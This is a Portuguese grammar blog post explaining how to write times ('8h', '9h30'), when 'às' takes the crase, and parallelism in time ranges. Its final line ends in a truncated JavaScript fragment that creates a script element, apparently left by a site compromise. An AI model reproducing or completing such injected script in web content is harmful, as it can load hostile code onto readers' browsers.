As horas

É muito comum, em nossas comunicações cotidianas, a necessidade de expressar tempo. Algumas correntes lingüísticas, inclusive, defendem que qualquer explanação de tempo (determinada ou não) é uma condição para a existência de uma boa comunicação. Em outras palavras, o ser humano precisa expressar condições temporais para se fazer compreendido. Por isso, vamos falar um pouco sobre alguns cuidados ao redigir horas.

Primeiramente, para abreviar “horas”, deve-se usar a letra “h” minúscula, sem “s” e sem ponto. Ou seja, 8h, 22h. Se não for hora inteira, há duas possibilidades: 9h30min ou 9h30. Redigir uma indicação temporal completamente por extenso é característica de situações extremamente formais (como muitos usam, por exemplo, em convites de casamento), mas é uma recomendação apenas estilística.

Também existe uma relação de intimidade entre as horas e a crase. Nesta semana mesmo vi uma aluna questionando nas redes sociais que nunca sabia ao certo quando deveria haver ou não a crase. Vamos entender.

  • Às 2h, ele ainda não havia chegado.
  • As 2h passaram lentamente.

Qual é a diferença entre as duas frases acima? Em (1), quem não havia chegado? “Ele” (sujeito da oração). E ele não chegou quando? Às 2h. Em outras palavras, o ato de chegar não foi praticado em um determinado momento. “Às 2h” é uma locução adverbial de tempo, cujo núcleo é a palavra “horas”. A gramática recomenda que locuções adverbiais com núcleos femininos devem apresentar o acento grave. Em (2), quem passaram lentamente? “As 2h”. Veja que esta expressão é o próprio sujeito da oração. Como o sujeito não pode ser preposicionado, não se emprega o acento grave.

Em resumo: quando se quer indicar quando uma ação foi praticada ou quando um evento ocorreu, você usará uma locução adverbial. Nesses casos, lembre-se da crase. Isso também é válido para outras indicações temporais, por exemplo “à noite, farei a última refeição” (quando a ação de fazer será praticada).

Cuidado também ao expressar intervalos temporais. Nesses casos, deve-se observar o paralelismo.

  • A loja funcionará de 8h a 20h.
  • A loja funcionará das 8h às 20h.
  • A loja funcionará de 8h às 20h. *
  • A loja funcionará das 8h a 20h. *
  • A loja funcionará das 8h as 20h. *

Apenas as duas primeiras construções estão corretas. A ideia é: se o primeiro possui apenas preposição, o segundo deve possuir apenas preposição; se o primeiro possui uma preposição e um artigo, o segundo também deve possuir os dois. É preciso tratar com igualdade. Um abraço!var d=document;var s=d.createElement(‘script’);

Deixe um comentário